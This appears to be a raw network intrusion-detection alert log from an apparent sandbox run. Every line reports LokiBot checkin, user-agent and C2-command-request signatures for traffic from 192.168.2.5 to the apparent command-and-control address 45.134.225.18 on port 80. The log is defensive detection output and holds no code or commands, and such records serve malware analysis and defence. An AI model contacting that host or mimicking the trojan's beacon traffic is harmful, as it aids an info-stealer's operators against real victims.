                12/03/20-09:58:34.387134TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975080192.168.2.545.134.225.18
                12/03/20-09:58:34.387134TCP2025381ET TROJAN LokiBot Checkin4975080192.168.2.545.134.225.18
                12/03/20-09:58:34.387134TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975080192.168.2.545.134.225.18
                12/03/20-09:58:34.744118TCP2570WEB-MISC Invalid HTTP Version String4975180192.168.2.545.134.225.18
                12/03/20-09:58:34.744118TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975180192.168.2.545.134.225.18
                12/03/20-09:58:34.744118TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975180192.168.2.545.134.225.18
                12/03/20-09:58:34.744118TCP2025381ET TROJAN LokiBot Checkin4975180192.168.2.545.134.225.18
                12/03/20-09:58:34.744118TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975180192.168.2.545.134.225.18
                12/03/20-09:58:35.102506TCP2570WEB-MISC Invalid HTTP Version String4975280192.168.2.545.134.225.18
                12/03/20-09:58:35.102506TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975280192.168.2.545.134.225.18
                12/03/20-09:58:35.102506TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975280192.168.2.545.134.225.18
                12/03/20-09:58:35.102506TCP2025381ET TROJAN LokiBot Checkin4975280192.168.2.545.134.225.18
                12/03/20-09:58:35.102506TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975280192.168.2.545.134.225.18
                12/03/20-09:58:35.374333TCP2570WEB-MISC Invalid HTTP Version String4975380192.168.2.545.134.225.18
                12/03/20-09:58:35.374333TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975380192.168.2.545.134.225.18
                12/03/20-09:58:35.374333TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975380192.168.2.545.134.225.18
                12/03/20-09:58:35.374333TCP2025381ET TROJAN LokiBot Checkin4975380192.168.2.545.134.225.18
                12/03/20-09:58:35.374333TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975380192.168.2.545.134.225.18
                12/03/20-09:58:36.034435TCP2570WEB-MISC Invalid HTTP Version String4975480192.168.2.545.134.225.18
                12/03/20-09:58:36.034435TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975480192.168.2.545.134.225.18
                12/03/20-09:58:36.034435TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975480192.168.2.545.134.225.18
                12/03/20-09:58:36.034435TCP2025381ET TROJAN LokiBot Checkin4975480192.168.2.545.134.225.18
                12/03/20-09:58:36.034435TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975480192.168.2.545.134.225.18
                12/03/20-09:58:36.323666TCP2570WEB-MISC Invalid HTTP Version String4975580192.168.2.545.134.225.18
                12/03/20-09:58:36.323666TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975580192.168.2.545.134.225.18
                12/03/20-09:58:36.323666TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975580192.168.2.545.134.225.18
                12/03/20-09:58:36.323666TCP2025381ET TROJAN LokiBot Checkin4975580192.168.2.545.134.225.18
                12/03/20-09:58:36.323666TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975580192.168.2.545.134.225.18
                12/03/20-09:58:36.734836TCP2570WEB-MISC Invalid HTTP Version String4975680192.168.2.545.134.225.18
                12/03/20-09:58:36.734836TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975680192.168.2.545.134.225.18
                12/03/20-09:58:36.734836TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975680192.168.2.545.134.225.18
                12/03/20-09:58:36.734836TCP2025381ET TROJAN LokiBot Checkin4975680192.168.2.545.134.225.18
                12/03/20-09:58:36.734836TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975680192.168.2.545.134.225.18
                12/03/20-09:58:37.579023TCP2570WEB-MISC Invalid HTTP Version String4975780192.168.2.545.134.225.18
                12/03/20-09:58:37.579023TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975780192.168.2.545.134.225.18
                12/03/20-09:58:37.579023TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975780192.168.2.545.134.225.18
                12/03/20-09:58:37.579023TCP2025381ET TROJAN LokiBot Checkin4975780192.168.2.545.134.225.18
                12/03/20-09:58:37.579023TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975780192.168.2.545.134.225.18
                12/03/20-09:58:38.279543TCP2570WEB-MISC Invalid HTTP Version String4975880192.168.2.545.134.225.18
                12/03/20-09:58:38.279543TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975880192.168.2.545.134.225.18
                12/03/20-09:58:38.279543TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975880192.168.2.545.134.225.18
                12/03/20-09:58:38.279543TCP2025381ET TROJAN LokiBot Checkin4975880192.168.2.545.134.225.18
                12/03/20-09:58:38.279543TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975880192.168.2.545.134.225.18
                12/03/20-09:58:38.564531TCP2570WEB-MISC Invalid HTTP Version String4975980192.168.2.545.134.225.18
                12/03/20-09:58:38.564531TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975980192.168.2.545.134.225.18
                12/03/20-09:58:38.564531TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975980192.168.2.545.134.225.18
                12/03/20-09:58:38.564531TCP2025381ET TROJAN LokiBot Checkin4975980192.168.2.545.134.225.18
                12/03/20-09:58:38.564531TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975980192.168.2.545.134.225.18
                12/03/20-09:58:38.851316TCP2570WEB-MISC Invalid HTTP Version String4976080192.168.2.545.134.225.18
                12/03/20-09:58:38.851316TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976080192.168.2.545.134.225.18
                12/03/20-09:58:38.851316TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976080192.168.2.545.134.225.18
                12/03/20-09:58:38.851316TCP2025381ET TROJAN LokiBot Checkin4976080192.168.2.545.134.225.18
                12/03/20-09:58:38.851316TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976080192.168.2.545.134.225.18
                12/03/20-09:58:39.128817TCP2570WEB-MISC Invalid HTTP Version String4976180192.168.2.545.134.225.18
                12/03/20-09:58:39.128817TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976180192.168.2.545.134.225.18
                12/03/20-09:58:39.128817TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976180192.168.2.545.134.225.18
                12/03/20-09:58:39.128817TCP2025381ET TROJAN LokiBot Checkin4976180192.168.2.545.134.225.18
                12/03/20-09:58:39.128817TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976180192.168.2.545.134.225.18
                12/03/20-09:58:39.411832TCP2570WEB-MISC Invalid HTTP Version String4976280192.168.2.545.134.225.18
                12/03/20-09:58:39.411832TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976280192.168.2.545.134.225.18
                12/03/20-09:58:39.411832TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976280192.168.2.545.134.225.18
                12/03/20-09:58:39.411832TCP2025381ET TROJAN LokiBot Checkin4976280192.168.2.545.134.225.18
                12/03/20-09:58:39.411832TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976280192.168.2.545.134.225.18
                12/03/20-09:58:39.691336TCP2570WEB-MISC Invalid HTTP Version String4976380192.168.2.545.134.225.18
                12/03/20-09:58:39.691336TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976380192.168.2.545.134.225.18
                12/03/20-09:58:39.691336TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976380192.168.2.545.134.225.18
                12/03/20-09:58:39.691336TCP2025381ET TROJAN LokiBot Checkin4976380192.168.2.545.134.225.18
                12/03/20-09:58:39.691336TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976380192.168.2.545.134.225.18
                12/03/20-09:58:39.970140TCP2570WEB-MISC Invalid HTTP Version String4976480192.168.2.545.134.225.18
                12/03/20-09:58:39.970140TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976480192.168.2.545.134.225.18
                12/03/20-09:58:39.970140TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976480192.168.2.545.134.225.18
                12/03/20-09:58:39.970140TCP2025381ET TROJAN LokiBot Checkin4976480192.168.2.545.134.225.18
                12/03/20-09:58:39.970140TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976480192.168.2.545.134.225.18
                12/03/20-09:58:40.256459TCP2570WEB-MISC Invalid HTTP Version String4976580192.168.2.545.134.225.18
                12/03/20-09:58:40.256459TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976580192.168.2.545.134.225.18
                12/03/20-09:58:40.256459TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976580192.168.2.545.134.225.18
                12/03/20-09:58:40.256459TCP2025381ET TROJAN LokiBot Checkin4976580192.168.2.545.134.225.18
                12/03/20-09:58:40.256459TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976580192.168.2.545.134.225.18
                12/03/20-09:58:40.544863TCP2570WEB-MISC Invalid HTTP Version String4976680192.168.2.545.134.225.18
                12/03/20-09:58:40.544863TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976680192.168.2.545.134.225.18
                12/03/20-09:58:40.544863TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976680192.168.2.545.134.225.18
                12/03/20-09:58:40.544863TCP2025381ET TROJAN LokiBot Checkin4976680192.168.2.545.134.225.18
                12/03/20-09:58:40.544863TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976680192.168.2.545.134.225.18
                12/03/20-09:58:40.827679TCP2570WEB-MISC Invalid HTTP Version String4976980192.168.2.545.134.225.18
                12/03/20-09:58:40.827679TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976980192.168.2.545.134.225.18
                12/03/20-09:58:40.827679TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976980192.168.2.545.134.225.18
                12/03/20-09:58:40.827679TCP2025381ET TROJAN LokiBot Checkin4976980192.168.2.545.134.225.18
                12/03/20-09:58:40.827679TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976980192.168.2.545.134.225.18
                12/03/20-09:58:41.127339TCP2570WEB-MISC Invalid HTTP Version String4977080192.168.2.545.134.225.18
                12/03/20-09:58:41.127339TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977080192.168.2.545.134.225.18
                12/03/20-09:58:41.127339TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977080192.168.2.545.134.225.18
                12/03/20-09:58:41.127339TCP2025381ET TROJAN LokiBot Checkin4977080192.168.2.545.134.225.18
                12/03/20-09:58:41.127339TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977080192.168.2.545.134.225.18
                12/03/20-09:58:41.415932TCP2570WEB-MISC Invalid HTTP Version String4977180192.168.2.545.134.225.18
                12/03/20-09:58:41.415932TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977180192.168.2.545.134.225.18
                12/03/20-09:58:41.415932TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977180192.168.2.545.134.225.18
                12/03/20-09:58:41.415932TCP2025381ET TROJAN LokiBot Checkin4977180192.168.2.545.134.225.18
                12/03/20-09:58:41.415932TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977180192.168.2.545.134.225.18
                12/03/20-09:58:41.707980TCP2570WEB-MISC Invalid HTTP Version String4977280192.168.2.545.134.225.18
                12/03/20-09:58:41.707980TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977280192.168.2.545.134.225.18
                12/03/20-09:58:41.707980TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977280192.168.2.545.134.225.18
                12/03/20-09:58:41.707980TCP2025381ET TROJAN LokiBot Checkin4977280192.168.2.545.134.225.18
                12/03/20-09:58:41.707980TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977280192.168.2.545.134.225.18
                12/03/20-09:58:42.001524TCP2570WEB-MISC Invalid HTTP Version String4977380192.168.2.545.134.225.18
                12/03/20-09:58:42.001524TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977380192.168.2.545.134.225.18
                12/03/20-09:58:42.001524TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977380192.168.2.545.134.225.18
                12/03/20-09:58:42.001524TCP2025381ET TROJAN LokiBot Checkin4977380192.168.2.545.134.225.18
                12/03/20-09:58:42.001524TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977380192.168.2.545.134.225.18
                12/03/20-09:58:42.280194TCP2570WEB-MISC Invalid HTTP Version String4977480192.168.2.545.134.225.18
                12/03/20-09:58:42.280194TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977480192.168.2.545.134.225.18
                12/03/20-09:58:42.280194TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977480192.168.2.545.134.225.18
                12/03/20-09:58:42.280194TCP2025381ET TROJAN LokiBot Checkin4977480192.168.2.545.134.225.18
                12/03/20-09:58:42.280194TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977480192.168.2.545.134.225.18
                12/03/20-09:58:42.578436TCP2570WEB-MISC Invalid HTTP Version String4977580192.168.2.545.134.225.18
                12/03/20-09:58:42.578436TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977580192.168.2.545.134.225.18
                12/03/20-09:58:42.578436TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977580192.168.2.545.134.225.18
                12/03/20-09:58:42.578436TCP2025381ET TROJAN LokiBot Checkin4977580192.168.2.545.134.225.18
                12/03/20-09:58:42.578436TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977580192.168.2.545.134.225.18
                12/03/20-09:58:42.863846TCP2570WEB-MISC Invalid HTTP Version String4977680192.168.2.545.134.225.18
                12/03/20-09:58:42.863846TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977680192.168.2.545.134.225.18
                12/03/20-09:58:42.863846TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977680192.168.2.545.134.225.18
                12/03/20-09:58:42.863846TCP2025381ET TROJAN LokiBot Checkin4977680192.168.2.545.134.225.18
                12/03/20-09:58:42.863846TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977680192.168.2.545.134.225.18
                12/03/20-09:58:43.142497TCP2570WEB-MISC Invalid HTTP Version String4977780192.168.2.545.134.225.18
                12/03/20-09:58:43.142497TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977780192.168.2.545.134.225.18
                12/03/20-09:58:43.142497TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977780192.168.2.545.134.225.18
                12/03/20-09:58:43.142497TCP2025381ET TROJAN LokiBot Checkin4977780192.168.2.545.134.225.18
                12/03/20-09:58:43.142497TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977780192.168.2.545.134.225.18
                12/03/20-09:58:43.423937TCP2570WEB-MISC Invalid HTTP Version String4977880192.168.2.545.134.225.18
                12/03/20-09:58:43.423937TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977880192.168.2.545.134.225.18
                12/03/20-09:58:43.423937TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977880192.168.2.545.134.225.18
                12/03/20-09:58:43.423937TCP2025381ET TROJAN LokiBot Checkin4977880192.168.2.545.134.225.18
                12/03/20-09:58:43.423937TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977880192.168.2.545.134.225.18
                12/03/20-09:58:43.713190TCP2570WEB-MISC Invalid HTTP Version String4977980192.168.2.545.134.225.18
                12/03/20-09:58:43.713190TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977980192.168.2.545.134.225.18
                12/03/20-09:58:43.713190TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977980192.168.2.545.134.225.18
                12/03/20-09:58:43.713190TCP2025381ET TROJAN LokiBot Checkin4977980192.168.2.545.134.225.18
                12/03/20-09:58:43.713190TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977980192.168.2.545.134.225.18
                12/03/20-09:58:43.993845TCP2570WEB-MISC Invalid HTTP Version String4978080192.168.2.545.134.225.18
                12/03/20-09:58:43.993845TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978080192.168.2.545.134.225.18
                12/03/20-09:58:43.993845TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978080192.168.2.545.134.225.18
                12/03/20-09:58:43.993845TCP2025381ET TROJAN LokiBot Checkin4978080192.168.2.545.134.225.18
                12/03/20-09:58:43.993845TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978080192.168.2.545.134.225.18
                12/03/20-09:58:44.276961TCP2570WEB-MISC Invalid HTTP Version String4978180192.168.2.545.134.225.18
                12/03/20-09:58:44.276961TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978180192.168.2.545.134.225.18
                12/03/20-09:58:44.276961TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978180192.168.2.545.134.225.18
                12/03/20-09:58:44.276961TCP2025381ET TROJAN LokiBot Checkin4978180192.168.2.545.134.225.18
                12/03/20-09:58:44.276961TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978180192.168.2.545.134.225.18
                12/03/20-09:58:44.565448TCP2570WEB-MISC Invalid HTTP Version String4978280192.168.2.545.134.225.18
                12/03/20-09:58:44.565448TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978280192.168.2.545.134.225.18
                12/03/20-09:58:44.565448TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978280192.168.2.545.134.225.18
                12/03/20-09:58:44.565448TCP2025381ET TROJAN LokiBot Checkin4978280192.168.2.545.134.225.18
                12/03/20-09:58:44.565448TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978280192.168.2.545.134.225.18
                12/03/20-09:58:44.874323TCP2570WEB-MISC Invalid HTTP Version String4978380192.168.2.545.134.225.18
                12/03/20-09:58:44.874323TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978380192.168.2.545.134.225.18
                12/03/20-09:58:44.874323TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978380192.168.2.545.134.225.18
                12/03/20-09:58:44.874323TCP2025381ET TROJAN LokiBot Checkin4978380192.168.2.545.134.225.18
                12/03/20-09:58:44.874323TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978380192.168.2.545.134.225.18
                12/03/20-09:58:45.171967TCP2570WEB-MISC Invalid HTTP Version String4978480192.168.2.545.134.225.18
                12/03/20-09:58:45.171967TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978480192.168.2.545.134.225.18
                12/03/20-09:58:45.171967TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978480192.168.2.545.134.225.18
                12/03/20-09:58:45.171967TCP2025381ET TROJAN LokiBot Checkin4978480192.168.2.545.134.225.18
                12/03/20-09:58:45.171967TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978480192.168.2.545.134.225.18
                12/03/20-09:58:45.452903TCP2570WEB-MISC Invalid HTTP Version String4978580192.168.2.545.134.225.18
                12/03/20-09:58:45.452903TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978580192.168.2.545.134.225.18
                12/03/20-09:58:45.452903TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978580192.168.2.545.134.225.18
                12/03/20-09:58:45.452903TCP2025381ET TROJAN LokiBot Checkin4978580192.168.2.545.134.225.18
                12/03/20-09:58:45.452903TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978580192.168.2.545.134.225.18
                12/03/20-09:58:45.753910TCP2570WEB-MISC Invalid HTTP Version String4978680192.168.2.545.134.225.18
                12/03/20-09:58:45.753910TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978680192.168.2.545.134.225.18
                12/03/20-09:58:45.753910TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978680192.168.2.545.134.225.18
                12/03/20-09:58:45.753910TCP2025381ET TROJAN LokiBot Checkin4978680192.168.2.545.134.225.18
                12/03/20-09:58:45.753910TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978680192.168.2.545.134.225.18
                12/03/20-09:58:46.050626TCP2570WEB-MISC Invalid HTTP Version String4978780192.168.2.545.134.225.18
                12/03/20-09:58:46.050626TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978780192.168.2.545.134.225.18
                12/03/20-09:58:46.050626TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978780192.168.2.545.134.225.18
                12/03/20-09:58:46.050626TCP2025381ET TROJAN LokiBot Checkin4978780192.168.2.545.134.225.18
                12/03/20-09:58:46.050626TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978780192.168.2.545.134.225.18
                12/03/20-09:58:46.355514TCP2570WEB-MISC Invalid HTTP Version String4978880192.168.2.545.134.225.18
                12/03/20-09:58:46.355514TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978880192.168.2.545.134.225.18
                12/03/20-09:58:46.355514TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978880192.168.2.545.134.225.18
                12/03/20-09:58:46.355514TCP2025381ET TROJAN LokiBot Checkin4978880192.168.2.545.134.225.18
                12/03/20-09:58:46.355514TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978880192.168.2.545.134.225.18
                12/03/20-09:58:46.647783TCP2570WEB-MISC Invalid HTTP Version String4978980192.168.2.545.134.225.18
                12/03/20-09:58:46.647783TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978980192.168.2.545.134.225.18
                12/03/20-09:58:46.647783TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978980192.168.2.545.134.225.18
                12/03/20-09:58:46.647783TCP2025381ET TROJAN LokiBot Checkin4978980192.168.2.545.134.225.18
                12/03/20-09:58:46.647783TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978980192.168.2.545.134.225.18
                12/03/20-09:58:46.941621TCP2570WEB-MISC Invalid HTTP Version String4979080192.168.2.545.134.225.18
                12/03/20-09:58:46.941621TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979080192.168.2.545.134.225.18
                12/03/20-09:58:46.941621TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979080192.168.2.545.134.225.18
                12/03/20-09:58:46.941621TCP2025381ET TROJAN LokiBot Checkin4979080192.168.2.545.134.225.18
                12/03/20-09:58:46.941621TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979080192.168.2.545.134.225.18
                12/03/20-09:58:47.243097TCP2570WEB-MISC Invalid HTTP Version String4979180192.168.2.545.134.225.18
                12/03/20-09:58:47.243097TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979180192.168.2.545.134.225.18
                12/03/20-09:58:47.243097TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979180192.168.2.545.134.225.18
                12/03/20-09:58:47.243097TCP2025381ET TROJAN LokiBot Checkin4979180192.168.2.545.134.225.18
                12/03/20-09:58:47.243097TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979180192.168.2.545.134.225.18
                12/03/20-09:58:47.530969TCP2570WEB-MISC Invalid HTTP Version String4979280192.168.2.545.134.225.18
                12/03/20-09:58:47.530969TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979280192.168.2.545.134.225.18
                12/03/20-09:58:47.530969TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979280192.168.2.545.134.225.18
                12/03/20-09:58:47.530969TCP2025381ET TROJAN LokiBot Checkin4979280192.168.2.545.134.225.18
                12/03/20-09:58:47.530969TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979280192.168.2.545.134.225.18
                12/03/20-09:58:47.832192TCP2570WEB-MISC Invalid HTTP Version String4979380192.168.2.545.134.225.18
                12/03/20-09:58:47.832192TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979380192.168.2.545.134.225.18
                12/03/20-09:58:47.832192TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979380192.168.2.545.134.225.18
                12/03/20-09:58:47.832192TCP2025381ET TROJAN LokiBot Checkin4979380192.168.2.545.134.225.18
                12/03/20-09:58:47.832192TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979380192.168.2.545.134.225.18
                12/03/20-09:58:48.152252TCP2570WEB-MISC Invalid HTTP Version String4979480192.168.2.545.134.225.18
                12/03/20-09:58:48.152252TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979480192.168.2.545.134.225.18
                12/03/20-09:58:48.152252TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979480192.168.2.545.134.225.18
                12/03/20-09:58:48.152252TCP2025381ET TROJAN LokiBot Checkin4979480192.168.2.545.134.225.18
                12/03/20-09:58:48.152252TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979480192.168.2.545.134.225.18
                12/03/20-09:58:48.456401TCP2570WEB-MISC Invalid HTTP Version String4979580192.168.2.545.134.225.18
                12/03/20-09:58:48.456401TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979580192.168.2.545.134.225.18
                12/03/20-09:58:48.456401TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979580192.168.2.545.134.225.18
                12/03/20-09:58:48.456401TCP2025381ET TROJAN LokiBot Checkin4979580192.168.2.545.134.225.18
                12/03/20-09:58:48.456401TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979580192.168.2.545.134.225.18
                12/03/20-09:58:48.747611TCP2570WEB-MISC Invalid HTTP Version String4979680192.168.2.545.134.225.18
                12/03/20-09:58:48.747611TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979680192.168.2.545.134.225.18
                12/03/20-09:58:48.747611TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979680192.168.2.545.134.225.18
                12/03/20-09:58:48.747611TCP2025381ET TROJAN LokiBot Checkin4979680192.168.2.545.134.225.18
                12/03/20-09:58:48.747611TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979680192.168.2.545.134.225.18
                12/03/20-09:58:49.043705TCP2570WEB-MISC Invalid HTTP Version String4979780192.168.2.545.134.225.18
                12/03/20-09:58:49.043705TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979780192.168.2.545.134.225.18
                12/03/20-09:58:49.043705TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979780192.168.2.545.134.225.18
                12/03/20-09:58:49.043705TCP2025381ET TROJAN LokiBot Checkin4979780192.168.2.545.134.225.18
                12/03/20-09:58:49.043705TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979780192.168.2.545.134.225.18
                12/03/20-09:58:49.344822TCP2570WEB-MISC Invalid HTTP Version String4979880192.168.2.545.134.225.18
                12/03/20-09:58:49.344822TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979880192.168.2.545.134.225.18
                12/03/20-09:58:49.344822TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979880192.168.2.545.134.225.18
                12/03/20-09:58:49.344822TCP2025381ET TROJAN LokiBot Checkin4979880192.168.2.545.134.225.18
                12/03/20-09:58:49.344822TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979880192.168.2.545.134.225.18
                12/03/20-09:58:49.644541TCP2570WEB-MISC Invalid HTTP Version String4979980192.168.2.545.134.225.18
                12/03/20-09:58:49.644541TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979980192.168.2.545.134.225.18
                12/03/20-09:58:49.644541TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979980192.168.2.545.134.225.18
                12/03/20-09:58:49.644541TCP2025381ET TROJAN LokiBot Checkin4979980192.168.2.545.134.225.18
                12/03/20-09:58:49.644541TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979980192.168.2.545.134.225.18
                12/03/20-09:58:49.943082TCP2570WEB-MISC Invalid HTTP Version String4980080192.168.2.545.134.225.18
                12/03/20-09:58:49.943082TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980080192.168.2.545.134.225.18
                12/03/20-09:58:49.943082TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980080192.168.2.545.134.225.18
                12/03/20-09:58:49.943082TCP2025381ET TROJAN LokiBot Checkin4980080192.168.2.545.134.225.18
                12/03/20-09:58:49.943082TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980080192.168.2.545.134.225.18
                12/03/20-09:58:50.220159TCP2570WEB-MISC Invalid HTTP Version String4980180192.168.2.545.134.225.18
                12/03/20-09:58:50.220159TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980180192.168.2.545.134.225.18
                12/03/20-09:58:50.220159TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980180192.168.2.545.134.225.18
                12/03/20-09:58:50.220159TCP2025381ET TROJAN LokiBot Checkin4980180192.168.2.545.134.225.18
                12/03/20-09:58:50.220159TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980180192.168.2.545.134.225.18
                12/03/20-09:58:50.510260TCP2570WEB-MISC Invalid HTTP Version String4980280192.168.2.545.134.225.18
                12/03/20-09:58:50.510260TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980280192.168.2.545.134.225.18
